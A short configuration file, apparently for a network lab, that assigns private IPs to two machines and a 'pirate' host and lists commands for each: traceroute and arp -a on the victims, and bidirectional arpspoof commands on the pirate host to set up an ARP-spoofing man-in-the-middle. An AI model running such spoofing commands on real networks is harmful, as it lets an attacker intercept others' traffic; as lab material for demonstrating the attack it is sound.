ip_machine_1=10.10.10.2
ip_machine_2=10.10.10.3
ip_pirate=10.10.10.4

cmd_machine_1=traceroute $IP_MACHINE_2:arp -a:arp -a:traceroute $IP_MACHINE_2
cmd_pirate=arpspoof -t $IP_MACHINE_1 $IP_MACHINE_2:arpspoof -t $IP_MACHINE_2 $IP_MACHINE_1

dir_log=/tmp/log
log_file=/tmp/log/output.log

script_file=./goal.bash